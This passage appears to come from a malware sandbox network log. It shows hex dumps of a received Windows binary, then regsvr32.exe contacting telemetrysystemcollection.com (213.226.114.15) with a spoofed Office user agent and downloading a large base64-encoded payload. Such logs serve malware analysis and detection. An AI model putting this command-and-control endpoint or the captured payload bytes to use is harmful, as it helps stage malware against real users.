2022-06-16 18:22:58 UTC	248	IN	Data Raw: c2 a3 01 00 00 89 55 b8 8b 45 08 83 c0 0e 89 85 00 fe ff ff 8b 4d 08 81 c1 42 01 00 00 89 8d 1c ff ff ff 8b 55 08 81 c2 5e 01 00 00 89 95 cc fb ff ff 8b 45 08 05 80 00 00 00 89 85 18 ff ff ff 8b 4d 08 83 c1 2f 89 8d c8 fb ff ff 8b 55 08 81 c2 24 01 00 00 89 95 fc fd ff ff 8b 45 08 05 89 01 00 00 89 85 f8 fd ff ff 8b 4d 08 83 c1 68 89 8d d8 f9 ff ff 8b 55 08 81 c2 bd 00 00 00 89 95 f4 fd ff ff 8b 45 08 05 06 01 00 00 89 85 c4 fb ff ff 8b 4d 08 83 c1 52 89 8d f0 fd ff ff 8b 55 08 81 c2 d6 00 00 00 89 95 14 ff ff ff 8b 45 08 05 cb 01 00 00 89 85 ec fd ff ff 8b 4d 08 83 c1 67 89 8d d4 f9 ff ff 8b 55 08 83 c2 2b 89 95 10 ff ff ff 8b 45 08 05 ea 00 00 00 89 85 d0 f9 ff ff 8b 4d 08 83 c1 6e 89 8d c0 fb ff ff 8b 55 08 81 c2 f6 00 00 00 89 55 b4 8b 45 08 05 10 01 Data Ascii: UEMBU^EM/U$EMhUEMRUEMgU+EMnUUE
2022-06-16 18:22:58 UTC	264	IN	Data Raw: 85 28 fa ff ff 8b 4d 08 81 c1 1c 01 00 00 89 8d 24 fa ff ff 8b 55 08 83 c2 5d 89 95 08 fc ff ff 8b 45 08 05 ff 00 00 00 89 85 04 fc ff ff 8b 4d 08 81 c1 f1 00 00 00 89 8d 20 fa ff ff 8b 55 08 81 c2 61 01 00 00 89 95 10 fe ff ff 8b 45 08 05 07 01 00 00 89 85 00 fc ff ff 8b 4d 08 81 c1 e0 01 00 00 89 8d fc fb ff ff 8b 55 08 81 c2 64 01 00 00 89 95 f8 fb ff ff 8b 45 08 05 a0 01 00 00 89 85 0c fe ff ff 8b 4d 08 81 c1 91 01 00 00 89 8d 08 fe ff ff 8b 55 08 81 c2 db 00 00 00 89 95 04 fe ff ff 8b 45 08 05 76 01 00 00 89 45 b4 8b 4d 08 81 c1 ac 01 00 00 89 8d f4 fb ff ff 8b 55 08 81 c2 c3 01 00 00 89 95 30 ff ff ff 8b 45 08 05 d0 01 00 00 89 85 f0 fb ff ff 8b 4d 08 81 c1 ee 01 00 00 89 8d 1c fa ff ff 8b 55 08 81 c2 87 00 00 00 89 95 00 fe ff ff 8b 45 08 05 f2 01 Data Ascii: (M$U]EM UaEMUdEMUEvEMU0EMUE
2022-06-16 18:22:58 UTC	280	IN	Data Raw: 95 d4 fd ff ff 7c 0f 8b 45 d4 03 85 c0 fd ff ff 89 85 b0 fe ff ff 8b 8d c4 fc ff ff 0f af 8d f0 fe ff ff 89 4d cc 8b 95 ec fd ff ff 3b 95 58 ff ff ff 7c 12 8b 85 14 ff ff ff 03 85 24 fd ff ff 89 85 2c fd ff ff 8b 8d 60 ff ff ff 0f af 8d e8 fc ff ff 89 8d 3c fe ff ff 8b 95 00 fd ff ff 3b 95 44 fd ff ff 7c 12 8b 85 fc fe ff ff 03 85 10 fe ff ff 89 85 14 ff ff ff 8b 8d 58 ff ff ff 0f af 8d 18 ff ff ff 89 8d 74 ff ff ff 8b 95 fc fc ff ff 3b 55 88 7c 0c 8b 85 e0 fc ff ff 03 45 dc 89 45 c8 8b 8d 10 fd ff ff 3b 4d 80 7f 12 8b 95 a4 fd ff ff 03 95 2c ff ff ff 89 95 9c fd ff ff 8b 85 c4 fd ff ff 0f af 85 ac fe ff ff 89 45 f8 8b 4d e8 0f af 8d 78 fe ff ff 89 8d 90 fd ff ff 8b 95 c4 fe ff ff 0f af 95 3c fd ff ff 89 95 a0 fd ff ff 8b 45 a0 0f af 45 e8 89 85 20 fd ff Data Ascii: \|EM;X\|$,`<;D\|Xt;U\|EE;M,EMx<EE
2022-06-16 18:22:58 UTC	296	IN	Data Raw: 89 07 89 77 04 89 4f 08 33 c9 89 57 0c 8b 45 dc 8b 7d e4 89 45 f4 81 f7 6e 74 65 6c 8b 45 e8 35 69 6e 65 49 89 45 f8 8b 45 e0 35 47 65 6e 75 89 45 fc 33 c0 40 53 0f a2 8b f3 5b 8d 5d dc 89 03 8b 45 fc 89 73 04 0b c7 0b 45 f8 89 4b 08 89 53 0c 75 43 8b 45 dc 25 f0 3f ff 0f 3d c0 06 01 00 74 23 3d 60 06 02 00 74 1c 3d 70 06 02 00 74 15 3d 50 06 03 00 74 0e 3d 60 06 03 00 74 07 3d 70 06 03 00 75 11 8b 3d e4 4f 06 10 83 cf 01 89 3d e4 4f 06 10 eb 06 8b 3d e4 4f 06 10 8b 4d e4 6a 07 58 89 4d fc 39 45 f4 7c 2f 33 c9 53 0f a2 8b f3 5b 8d 5d dc 89 03 89 73 04 89 4b 08 8b 4d fc 89 53 0c 8b 5d e0 f7 c3 00 02 00 00 74 0e 83 cf 02 89 3d e4 4f 06 10 eb 03 8b 5d f0 a1 14 40 06 10 83 c8 02 c7 05 e0 4f 06 10 01 00 00 00 a3 14 40 06 10 f7 c1 00 00 10 00 0f 84 93 00 00 00 Data Ascii: wO3WE}EntelE5ineIEE5GenuE3@S[]EsEKSuCE%?=t#=`t=pt=Pt=`t=pu=O=O=OMjXM9E\|/3S[]sKMS]t=O]@O@
2022-06-16 18:22:58 UTC	312	IN	Data Raw: ff 40 08 8b 02 8b 08 66 8b 45 08 66 89 01 8b 02 83 00 02 b0 01 5d c2 08 00 8b ff 55 8b ec 83 ec 0c 53 56 8b f1 57 80 7e 3c 00 75 58 33 ff 39 7e 38 7e 51 8b 4e 34 8d 5e 18 89 4d f8 33 c0 66 89 45 fc 8b 46 08 50 8b 00 ff 70 04 8d 45 fc 51 50 e8 33 30 00 00 83 c4 10 89 45 f4 85 c0 7e 20 53 ff 75 fc 8d 8e 48 04 00 00 e8 66 ff ff ff 8b 4d f8 03 4d f4 47 89 4d f8 3b 7e 38 75 bf eb 1e 83 0b ff eb 19 8d 46 0c 50 8d 46 18 50 ff 76 38 8d 8e 48 04 00 00 ff 76 34 e8 09 00 00 00 5f 5e b0 01 5b c9 c2 04 00 8b ff 55 8b ec 51 53 8b 5d 0c 8b c1 89 45 fc 85 db 74 59 8b 00 57 8b 78 04 39 78 08 75 0b 80 78 0c 00 8b 45 10 74 3d eb 33 2b 78 08 3b fb 72 02 8b fb 56 8d 34 3f 56 ff 75 08 ff 30 e8 55 ce ff ff 8b 4d fc 83 c4 0c 8b 01 01 30 8b 01 5e 01 78 08 8b 01 80 78 0c 00 8b 45 Data Ascii: @fEf]USVW~<uX39~8~QN4^M3fEFPpEQP30E~ SuHfMMGM;~8uFPFPv8Hv4_^[UQS]EtYWx9xuxEt=3+x;rV4?Vu0UM0^xxE
2022-06-16 18:22:58 UTC	328	IN	Data Raw: 18 81 fe 50 01 00 00 72 db b0 01 eb 0a 6a 00 e8 1d 00 00 00 59 32 c0 5f 5e c3 8b ff 55 8b ec 6b 45 08 18 05 40 58 06 10 50 ff 15 ac c0 05 10 5d c3 8b ff 56 8b 35 90 59 06 10 85 f6 74 20 6b c6 18 57 8d b8 28 58 06 10 57 ff 15 2c c0 05 10 ff 0d 90 59 06 10 83 ef 18 83 ee 01 75 eb 5f b0 01 5e c3 8b ff 55 8b ec 6b 45 08 18 05 40 58 06 10 50 ff 15 b0 c0 05 10 5d c3 8b ff 55 8b ec 51 64 a1 30 00 00 00 56 33 f6 89 75 fc 8b 40 10 39 70 08 7c 0f 8d 45 fc 50 e8 4d e7 ff ff 83 7d fc 01 74 03 33 f6 46 8b c6 5e c9 c3 8b ff 55 8b ec 8b 45 0c 3b 45 08 76 05 83 c8 ff 5d c3 1b c0 f7 d8 5d c3 8b ff 55 8b ec 56 8b 75 08 57 85 f6 75 1a 8b 75 0c 8b ce e8 bc 06 00 00 33 ff 89 7e 08 89 7e 0c 89 7e 10 e9 84 00 00 00 33 ff 80 3e 00 75 1f 8b 75 0c 39 7e 0c 75 0d 6a 01 8b ce e8 ea Data Ascii: PrjY2_^UkE@XP]V5Yt kW(XW,Yu_^UkE@XP]UQd0V3u@9p\|EPM}t3F^UE;Ev]]UVuWuu3~~~3>uu9~uj
2022-06-16 18:22:58 UTC	344	IN	Data Raw: ff 8b ca 89 8d 84 f8 ff ff 85 c0 0f 84 da 03 00 00 83 f8 26 76 03 6a 26 58 0f b6 0c 85 e6 12 06 10 0f b6 34 85 e7 12 06 10 8b f9 89 85 b0 f8 ff ff c1 e7 02 57 8d 04 31 89 85 8c fa ff ff 8d 85 90 fa ff ff 6a 00 50 e8 30 4d ff ff 8b c6 c1 e0 02 50 8b 85 b0 f8 ff ff 0f b7 04 85 e4 12 06 10 8d 04 85 e0 09 06 10 50 8d 85 90 fa ff ff 03 c7 50 e8 c6 4e ff ff 8b bd 8c fa ff ff 83 c4 18 3b fb 0f 87 cc 00 00 00 8b bd 90 fa ff ff 85 ff 75 36 33 c0 50 89 85 bc f8 ff ff 89 85 5c fc ff ff 8d 85 c0 f8 ff ff 50 8d 85 60 fc ff ff 68 cc 01 00 00 50 e8 2d d1 ff ff 83 c4 10 8a c3 be cc 01 00 00 e9 02 03 00 00 3b fb 74 f0 83 bd 5c fc ff ff 00 74 e7 8b 85 5c fc ff ff 33 c9 89 85 a8 f8 ff ff 33 f6 8b c7 f7 a4 b5 60 fc ff ff 03 c1 89 84 b5 60 fc ff ff 83 d2 00 46 8b ca 3b b5 a8 Data Ascii: &vj&X4W1jP0MPPPN;u63P\P`hP-;t\t\33``F;
2022-06-16 18:22:58 UTC	360	IN	Data Raw: 5b 5e 5f c2 10 00 cc cc cc cc cc cc 57 56 55 33 ff 33 ed 8b 44 24 14 0b c0 7d 15 47 45 8b 54 24 10 f7 d8 f7 da 83 d8 00 89 44 24 14 89 54 24 10 8b 44 24 1c 0b c0 7d 14 47 8b 54 24 18 f7 d8 f7 da 83 d8 00 89 44 24 1c 89 54 24 18 0b c0 75 28 8b 4c 24 18 8b 44 24 14 33 d2 f7 f1 8b d8 8b 44 24 10 f7 f1 8b f0 8b c3 f7 64 24 18 8b c8 8b c6 f7 64 24 18 03 d1 eb 47 8b d8 8b 4c 24 18 8b 54 24 14 8b 44 24 10 d1 eb d1 d9 d1 ea d1 d8 0b db 75 f4 f7 f1 8b f0 f7 64 24 1c 8b c8 8b 44 24 18 f7 e6 03 d1 72 0e 3b 54 24 14 77 08 72 0f 3b 44 24 10 76 09 4e 2b 44 24 18 1b 54 24 1c 33 db 2b 44 24 10 1b 54 24 14 4d 79 07 f7 da f7 d8 83 da 00 8b ca 8b d3 8b d9 8b c8 8b c6 4f 75 07 f7 da f7 d8 83 da 00 5d 5e 5f c2 10 00 cc 80 f9 40 73 15 80 f9 20 73 06 0f a5 c2 d3 e0 c3 8b d0 33 Data Ascii: [^_WVU33D$}GET$D$T$D$}GT$D$T$u(L$D$3D$d$d$GL$T$D$ud$D$r;T$wr;D$vN+D$T$3+D$T$MyOu]^_@s s3
2022-06-16 18:22:58 UTC	376	IN	Data Raw: 00 00 00 00 69 00 74 00 00 00 00 00 6a 00 61 00 00 00 00 00 6b 00 6f 00 00 00 00 00 6e 00 6c 00 00 00 00 00 6e 00 6f 00 00 00 00 00 70 00 6c 00 00 00 00 00 70 00 74 00 00 00 00 00 72 00 6f 00 00 00 00 00 72 00 75 00 00 00 00 00 68 00 72 00 00 00 00 00 73 00 6b 00 00 00 00 00 73 00 71 00 00 00 00 00 73 00 76 00 00 00 00 00 74 00 68 00 00 00 00 00 74 00 72 00 00 00 00 00 75 00 72 00 00 00 00 00 69 00 64 00 00 00 00 00 75 00 6b 00 00 00 00 00 62 00 65 00 00 00 00 00 73 00 6c 00 00 00 00 00 65 00 74 00 00 00 00 00 6c 00 76 00 00 00 00 00 6c 00 74 00 00 00 00 00 66 00 61 00 00 00 00 00 76 00 69 00 00 00 00 00 68 00 79 00 00 00 00 00 61 00 7a 00 00 00 00 00 65 00 75 00 00 00 00 00 6d 00 6b 00 00 00 00 00 61 00 66 00 00 00 00 00 6b 00 61 00 00 00 00 00 66 00 6f Data Ascii: itjakonlnoplptroruhrsksqsvthtruridukbesletlvltfavihyazeumkafkafo
2022-06-16 18:22:58 UTC	392	IN	Data Raw: 3a 02 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 00 ad 01 46 72 65 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 a2 01 46 6c 75 73 68 46 69 6c 65 42 75 66 66 65 72 73 00 00 16 06 57 72 69 74 65 46 69 6c 65 00 03 02 47 65 74 43 6f 6e 73 6f 6c 65 4f 75 74 70 75 74 43 50 00 00 ff 01 47 65 74 43 6f 6e 73 6f 6c 65 4d 6f 64 65 00 00 4e 05 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 25 05 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 45 78 00 00 da 02 47 65 74 53 74 72 69 6e 67 54 79 70 65 57 00 00 89 00 43 6c 6f 73 65 48 61 6e 64 6c 65 00 ce 00 43 72 65 61 74 65 46 69 6c 65 57 00 15 06 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff Data Ascii: :GetEnvironmentStringsWFreeEnvironmentStringsWFlushFileBuffersWriteFileGetConsoleOutputCPGetConsoleModeNSetStdHandle%SetFilePointerExGetStringTypeWCloseHandleCreateFileWWriteConsoleW

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49182	213.226.114.15	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-06-16 18:22:59 UTC	401	OUT	GET /m8YYdu/mCQ2U9/home.aspx HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: telemetrysystemcollection.com Cache-Control: no-cache
2022-06-16 18:22:59 UTC	401	IN	HTTP/1.1 200 OK Date: Thu, 16 Jun 2022 18:22:59 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.4 Last-Modified: Tue, 14 Jun 2022 10:54:24 GMT ETag: "cb280-5e1663a52587a" Accept-Ranges: bytes Content-Length: 832128 Connection: close
2022-06-16 18:22:59 UTC	402	IN	Data Raw: 43 79 2f 59 57 6e 59 30 63 6c 46 6a 62 6a 4e 6c 6a 72 4e 61 4e 76 35 43 4e 44 68 45 5a 58 6c 69 4b 6a 51 35 65 45 56 56 51 33 52 45 56 45 46 74 52 6b 5a 31 53 46 70 31 4e 48 4a 52 5a 32 34 7a 0d 0a 5a 58 46 4d 57 6a 5a 47 51 6a 51 34 52 47 56 35 59 6d 73 30 4f 58 5a 61 37 30 31 30 38 46 32 4d 54 50 35 48 4f 59 56 37 49 56 77 62 49 6b 63 65 51 51 6f 57 50 6a 74 62 5a 69 46 56 56 69 6f 4b 0d 0a 44 55 49 49 55 52 6b 4b 4d 44 74 6a 48 53 70 30 42 53 49 56 5a 68 67 6e 50 68 41 61 66 31 78 74 53 6a 4e 6c 63 55 78 61 4e 6b 62 39 6c 67 73 6e 6e 72 6f 2f 57 73 2f 36 4a 58 57 75 67 43 6c 30 0d 0a 75 2b 6b 7a 64 37 43 32 46 57 71 61 6e 43 70 67 50 4b 31 75 56 5a 37 6b 41 77 65 72 67 57 6b 49 37 64 4d 68 55 39 4c 33 5a 45 6a 73 34 78 70 46 73 4a 63 63 58 65 2f 77 4b Data Ascii: Cy/YWnY0clFjbjNljrNaNv5CNDhEZXliKjQ5eEVVQ3REVEFtRkZ1SFp1NHJRZ24zZXFMWjZGQjQ4RGV5Yms0OXZa70108F2MTP5HOYV7IVwbIkceQQoWPjtbZiFVVioKDUIIURkKMDtjHSp0BSIVZhgnPhAaf1xtSjNlcUxaNkb9lgsnnro/Ws/6JXWugCl0u+kzd7C2FWqanCpgPK1uVZ7kAwergWkI7dMhU9L3ZEjs4xpFsJccXe/wK
2022-06-16 18:22:59 UTC	409	IN	Data Raw: 6c 69 43 2f 6e 74 4b 4c 65 72 6f 6f 6a 63 63 66 79 6f 42 43 4e 41 75 4e 37 69 79 65 36 66 59 78 38 55 2f 63 43 58 44 50 45 55 6e 6b 0d 0a 41 37 37 2b 42 61 4c 38 65 59 62 61 63 6d 59 7a 62 47 48 46 44 39 72 4e 42 38 43 78 41 5a 58 79 4c 35 71 2f 61 48 77 58 33 6b 49 6b 7a 78 6d 39 50 4b 36 67 59 30 6c 61 2f 6e 6d 4f 75 51 6d 77 0d 0a 4d 57 58 36 43 61 61 39 6f 78 2f 32 50 45 53 70 74 61 36 6d 2b 47 7a 7a 71 64 61 76 59 4d 30 5a 76 65 59 44 75 72 4e 49 57 6b 62 39 2b 51 53 62 37 66 46 74 2b 45 62 54 66 45 4c 4a 63 54 44 4e 0d 0a 49 49 48 70 4a 38 79 77 4e 62 48 65 56 6e 78 45 58 56 48 6b 45 36 72 2b 44 61 37 38 63 59 4c 61 4b 70 34 38 30 32 41 65 30 58 4f 36 45 74 7a 78 55 6d 52 35 36 53 66 49 30 57 6d 62 56 30 50 2f 0d 0a 41 61 6a 4b 69 42 75 45 63 55 69 Data Ascii: liC/ntKLeroojccfyoBCNAuN7iye6fYx8U/cCXDPEUnkA77+BaL8eYbacmYzbGHFD9rNB8CxAZXyL5q/aHwX3kIkzxm9PK6gY0la/nmOuQmwMWX6Caa9ox/2PESpta6m+GzzqdavYM0ZveYDurNIWkb9+QSb7fFt+EbTfELJcTDNIIHpJ8ywNbHeVnxEXVHkE6r+Da78cYLaKp4802Ae0XO6EtzxUmR56SfI0WmbV0P/AajKiBuEcUi
2022-06-16 18:22:59 UTC	425	IN	Data Raw: 76 53 65 78 37 43 76 50 37 6e 6e 46 46 38 62 4e 46 38 53 78 45 59 33 79 4a 35 4b 39 0d 0a 66 4a 54 4f 47 4b 2f 39 43 59 44 4b 4f 4b 37 50 49 4b 7a 52 4d 4e 44 37 46 4c 2f 6c 66 6f 58 34 41 59 61 39 45 35 35 6d 73 77 6d 39 6b 51 69 46 4e 44 6e 7a 41 4b 6e 49 66 4d 30 5a 6b 65 59 54 0d 0a 75 76 35 4b 32 62 55 6b 2b 52 79 62 35 7a 4c 75 6c 42 47 59 4d 6b 61 4f 2b 50 53 49 71 62 57 75 70 76 6a 31 74 49 6d 5a 6a 37 67 52 33 36 33 75 71 6e 4c 38 42 61 72 2b 63 59 4c 59 49 6f 4b 34 0d 0a 4b 4a 33 50 6d 7a 4c 50 44 38 79 7a 45 57 33 77 4e 37 4b 2f 66 49 44 4f 58 63 6f 35 72 4e 38 55 68 63 38 54 6c 63 4d 66 68 62 30 33 74 65 77 6a 31 2b 77 38 6e 4e 46 6a 70 73 74 68 35 4d 38 67 0d 0a 70 65 73 76 77 4c 49 31 6e 64 77 4f 6f 4d 38 42 6c 65 64 45 7a 6a 43 30 30 54 6a Data Ascii: vSex7CvP7nnFF8bNF8SxEY3yJ5K9fJTOGK/9CYDKOK7PIKzRMND7FL/lfoX4AYa9E55mswm9kQiFNDnzAKnIfM0ZkeYTuv5K2bUk+Ryb5zLulBGYMkaO+PSIqbWupvj1tImZj7gR363uqnL8Bar+cYLYIoK4KJ3PmzLPD8yzEW3wN7K/fIDOXco5rN8Uhc8TlcMfhb03tewj1+w8nNFjpsth5M8gpesvwLI1ndwOoM8BledEzjC00Tj
2022-06-16 18:22:59 UTC	441	IN	Data Raw: 48 4c 66 6e 66 73 6e 36 47 66 61 2f 0d 0a 45 36 71 33 52 59 52 31 64 75 44 53 4e 44 6c 34 7a 68 43 76 2f 30 7a 64 44 4e 48 4e 45 38 6e 42 44 37 47 2f 4e 30 45 33 35 58 36 68 49 4d 63 50 33 68 53 71 63 51 6c 42 5a 66 71 6d 5a 72 39 38 0d 0a 6b 45 59 51 55 2f 30 42 2f 4d 6f 67 58 68 66 2b 48 55 34 6e 76 7a 66 35 4e 34 59 62 56 48 52 4d 32 66 4a 4b 79 58 6e 51 52 79 68 70 59 53 63 73 73 44 58 68 33 68 61 6f 62 77 46 52 37 6f 52 48 0d 0a 4a 38 4d 66 73 54 63 33 51 54 66 6c 66 73 45 67 70 4b 55 47 51 30 4b 33 2f 45 6a 75 4c 4b 4c 70 39 6a 6a 78 45 49 48 49 4d 66 6a 64 42 4e 57 42 41 34 6c 49 57 6e 55 30 38 79 79 7a 62 69 4e 6c 0d 0a 63 54 35 58 75 77 75 57 5a 62 55 52 33 53 75 4b 32 68 77 37 65 4d 34 51 6c 79 54 50 47 66 6b 38 72 6a 71 49 54 46 72 32 38 48 71 Data Ascii: HLfnfsn6Gfa/E6q3RYR1duDSNDl4zhCv/0zdDNHNE8nBD7G/N0E35X6hIMcP3hSqcQlBZfqmZr98kEYQU/0B/MogXhf+HU4nvzf5N4YbVHRM2fJKyXnQRyhpYScssDXh3haobwFR7oRHJ8MfsTc3QTflfsEgpKUGQ0K3/EjuLKLp9jjxEIHIMfjdBNWBA4lIWnU08yyzbiNlcT5XuwuWZbUR3SuK2hw7eM4QlyTPGfk8rjqITFr28Hq
2022-06-16 18:22:59 UTC	457	IN	Data Raw: 30 31 35 58 61 52 2b 6b 51 4c 76 51 75 2b 33 50 66 6e 6d 6f 62 72 4c 39 79 79 6e 52 69 58 52 33 53 49 6d 49 32 68 69 6f 6f 67 77 37 62 32 32 47 72 59 4b 70 4b 34 49 49 33 46 48 38 37 4e 0d 0a 44 38 79 37 68 57 48 77 4c 35 36 2f 62 49 7a 4f 45 4c 76 2f 54 6d 38 4a 5a 54 4a 53 2f 68 31 53 2f 47 47 43 32 69 4b 65 59 2b 34 38 73 4c 4a 50 32 62 33 4c 30 31 2f 75 4e 47 72 6a 65 64 58 7a 0d 0a 45 4c 6b 52 2f 77 47 67 79 6d 55 58 7a 54 69 30 73 6b 71 53 6a 61 37 75 4b 39 76 75 6c 42 47 59 4d 6b 61 4f 2b 50 53 49 71 62 55 33 34 64 69 36 6c 46 33 63 44 6f 6a 50 45 62 33 6b 41 37 37 2b 0d 0a 42 61 4c 32 39 58 62 59 4b 70 71 34 4d 49 58 48 48 38 37 4e 53 41 39 77 54 42 46 74 36 54 38 38 73 43 32 31 33 67 61 45 46 4e 38 4d 6b 61 37 66 36 72 65 6c 6e 69 2f 35 48 47 2f Data Ascii: 015XaR+kQLvQu+3PfnmobrL9yynRiXR3SImI2hioogw7b22GrYKpK4II3FH87ND8y7hWHwL56/bIzOELv/Tm8JZTJS/h1S/GGC2iKeY+48sLJP2b3L01/uNGrjedXzELkR/wGgymUXzTi0skqSja7uK9vulBGYMkaO+PSIqbU34di6lF3cDojPEb3kA77+BaL29XbYKpq4MIXHH87NSA9wTBFt6T88sC213gaEFN8Mka7f6relni/5HG/
2022-06-16 18:22:59 UTC	473	IN	Data Raw: 6f 7a 5a 58 45 6e 6b 73 6e 4e 31 33 7a 48 75 35 70 36 4b 47 36 39 74 44 79 36 71 72 7a 2f 77 52 43 2b 6b 72 6e 4e 66 63 48 58 4e 63 75 4e 0d 0a 72 75 7a 37 63 35 71 4f 73 39 6f 4d 52 44 63 39 2f 77 48 56 65 47 4a 71 4e 4e 4a 2f 67 68 44 7a 64 45 52 55 51 65 63 44 39 76 30 4e 76 58 71 43 50 37 62 69 70 30 59 55 2b 68 6d 71 74 59 52 47 0d 0a 76 61 31 34 6d 6f 61 64 30 6a 41 35 65 45 55 2b 69 34 76 50 77 58 32 53 75 62 6c 32 41 6c 37 38 75 55 71 75 6d 4a 47 34 34 45 6d 7a 70 63 6e 4e 53 72 32 31 63 4a 71 47 6e 65 47 68 44 59 65 36 0d 0a 71 73 4e 4f 52 53 46 49 71 67 50 71 64 45 68 61 64 64 39 31 6c 69 4c 43 4d 32 56 78 54 4e 42 7a 36 73 70 78 33 6b 76 54 4e 49 54 76 2f 55 78 76 4c 55 68 51 64 45 51 38 36 62 74 42 56 68 30 49 0d 0a 71 48 49 6b 6d 70 4d 4d 61 Data Ascii: ozZXEnksnN13zHu5p6KG69tDy6qrz/wRC+krnNfcHXNcuNruz7c5qOs9oMRDc9/wHVeGJqNNJ/ghDzdERUQecD9v0NvXqCP7bip0YU+hmqtYRGva14moad0jA5eEU+i4vPwX2Subl2Al78uUqumJG44EmzpcnNSr21cJqGneGhDYe6qsNORSFIqgPqdEhadd91liLCM2VxTNBz6spx3kvTNITv/UxvLUhQdEQ86btBVh0IqHIkmpMMa
2022-06-16 18:22:59 UTC	489	IN	Data Raw: 5a 78 51 2b 7a 32 77 34 4a 42 49 34 49 67 79 57 4b 74 63 63 57 48 75 71 71 38 2b 51 6d 49 0d 0a 71 66 61 6b 52 33 58 43 48 38 58 64 76 55 56 6e 62 74 71 54 65 6b 78 61 76 51 75 79 74 30 46 73 59 58 62 6d 48 7a 55 35 65 43 30 64 72 58 4e 55 32 63 77 4a 75 72 6d 4b 6f 4d 74 49 4e 48 4b 58 0d 0a 49 70 49 79 36 4f 51 6f 70 73 6d 35 45 46 34 38 79 65 41 4e 6d 5a 58 4c 61 66 4d 49 70 61 76 68 64 6c 64 42 35 4d 4f 4f 69 4c 65 6c 2f 72 6d 36 72 4a 69 52 75 75 67 64 73 36 58 4a 67 41 66 49 0d 0a 4f 73 38 77 69 65 47 6f 64 4c 4a 36 7a 4e 42 58 69 62 75 72 79 69 64 43 7a 2f 68 51 70 34 72 4c 2b 51 4e 76 35 36 5a 35 6a 4c 4f 6c 75 38 4e 57 79 63 65 37 37 50 77 4b 6c 63 76 47 38 38 67 35 0d 0a 76 49 75 37 42 63 72 34 4c 72 6d 4b 74 77 67 66 55 66 2f 55 78 35 66 4d 6d Data Ascii: ZxQ+z2w4JBI4IgyWKtccWHuqq8+QmIqfakR3XCH8XdvUVnbtqTekxavQuyt0FsYXbmHzU5eC0drXNU2cwJurmKoMtINHKXIpIy6OQopsm5EF48yeANmZXLafMIpavhdldB5MOOiLel/rm6rJiRuugds6XJgAfIOs8wieGodLJ6zNBXiburyidCz/hQp4rL+QNv56Z5jLOlu8NWyce77PwKlcvG88g5vIu7Bcr4LrmKtwgfUf/Ux5fMm
2022-06-16 18:22:59 UTC	505	IN	Data Raw: 55 50 79 73 30 48 50 4c 4d 4a 6e 66 49 33 0d 0a 6c 72 31 78 63 4d 77 46 54 2f 38 4a 58 4b 6b 4d 67 55 64 31 77 37 38 6f 39 6e 35 52 71 36 4c 2f 71 62 32 41 6c 76 71 4b 6a 76 68 74 7a 34 6e 36 6a 6d 4b 2f 66 48 43 44 56 55 66 2b 43 56 6a 4a 0d 0a 49 4c 37 4e 49 45 44 52 4d 4d 7a 35 48 4a 76 6e 63 57 33 34 42 6c 61 39 43 30 72 63 48 34 4e 6b 65 65 6d 50 61 66 74 77 52 5a 6b 57 2f 36 67 2b 76 67 57 54 50 58 4a 59 50 74 51 30 63 6c 46 6e 0d 0a 50 6c 66 73 56 45 78 61 4e 6b 62 42 32 41 53 44 49 4d 56 69 61 6a 51 35 45 6b 58 59 44 72 43 73 39 52 4a 70 52 6f 45 77 74 46 70 31 4e 48 4c 77 53 33 45 36 64 66 67 4a 71 6f 2b 2b 59 54 30 6f 0d 0a 72 47 34 6f 59 6d 71 39 66 4b 54 4f 47 4a 38 6c 7a 78 6c 4a 68 65 72 55 64 45 6a 54 4d 4e 7a 78 4c 49 39 75 50 4f 44 62 54 Data Ascii: UPys0HPLMJnfI3lr1xcMwFT/8JXKkMgUd1w78o9n5Rq6L/qb2AlvqKjvhtz4n6jmK/fHCDVUf+CVjJIL7NIEDRMMz5HJvncW34Bla9C0rcH4NkeemPaftwRZkW/6g+vgWTPXJYPtQ0clFnPlfsVExaNkbB2ASDIMViajQ5EkXYDrCs9RJpRoEwtFp1NHLwS3E6dfgJqo++YT0orG4oYmq9fKTOGJ8lzxlJherUdEjTMNzxLI9uPODbT
2022-06-16 18:22:59 UTC	521	IN	Data Raw: 6b 74 37 4d 39 63 72 48 7a 79 69 78 69 76 69 38 4f 48 69 44 45 4c 39 7a 7a 77 47 6c 37 49 54 75 64 55 68 61 2f 47 47 32 58 74 45 72 33 7a 58 36 41 5a 37 65 49 2f 58 4b 78 38 38 6f 76 59 6f 48 0d 0a 76 44 68 34 67 78 43 2f 66 4d 38 5a 70 65 79 48 68 6e 56 49 57 76 78 35 73 6c 37 52 4f 39 67 33 2b 67 47 61 33 67 62 31 79 73 66 50 4b 4c 6d 4b 49 72 77 34 65 49 4d 51 76 33 33 50 45 61 56 6f 0d 0a 70 6b 5a 31 53 4e 4d 77 6a 50 6b 63 33 2b 64 2b 30 66 6f 5a 37 72 38 54 2f 72 39 39 2b 4b 4a 35 59 6d 6f 30 4f 66 4d 49 36 59 51 31 51 46 52 42 62 55 62 4e 4f 50 43 79 74 33 52 7a 55 61 45 72 0d 0a 7a 32 2f 38 47 56 4a 6b 79 77 2b 59 30 46 61 56 68 70 32 73 63 63 56 7a 7a 68 69 6e 6e 4b 4a 33 51 6d 33 4e 43 35 47 67 31 4a 34 32 63 74 6f 71 69 74 74 7a 5a 55 39 61 76 Data Ascii: 